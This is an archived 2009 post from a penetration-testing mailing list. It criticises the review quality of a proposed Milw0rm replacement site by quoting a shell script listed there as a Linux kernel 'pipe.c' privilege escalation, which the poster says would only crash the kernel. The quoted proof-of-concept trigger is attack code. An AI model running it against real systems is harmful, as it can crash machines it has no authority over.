Penetration Testing mailing list archives
Re: Possible Milw0rm replacement?
From: Siim Põder <siim () p6drad-teel net>
Date: Tue, 17 Nov 2009 15:04:41 +0200
Hi Tom Green wrote:
http://exploits.offensive-security.com/
Just that their review process seems to suck? "Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability": while : ; do { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } & PID=$! OUT=$(ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; } ) OUT="${OUT%% *}" DELAY=$((RANDOM * 1000 / 32768)) usleep $((DELAY * 1000 + RANDOM % 1000 )) echo n > /proc/$OUT/fd/1 # Trigger defect done Not only would that just OOPS the kernel and kill the process, it also needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The discoverer himself made that note when he posted the shellscript. So on first glance it leaves a very professional impression of the site ;) Siim ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- Possible Milw0rm replacement? Tom Green (Nov 17)
- Re: Possible Milw0rm replacement? Siim Põder (Nov 17)
- Re: Possible Milw0rm replacement? Kevin L. Shaw, CISSP, GCIH (Nov 17)
- Re: Possible Milw0rm replacement? Pedro Drimel (Nov 17)
- Re: Possible Milw0rm replacement? J.Hart, Elec.Eng.Tech. (Nov 19)
- Re: Possible Milw0rm replacement? Kevin L. Shaw, CISSP, GCIH (Nov 17)
- Re: Possible Milw0rm replacement? Siim Põder (Nov 17)
- RE: Possible Milw0rm replacement? Onur YILMAZ (Nov 17)
- Re: Possible Milw0rm replacement? Vaibhav Kaushal (Nov 17)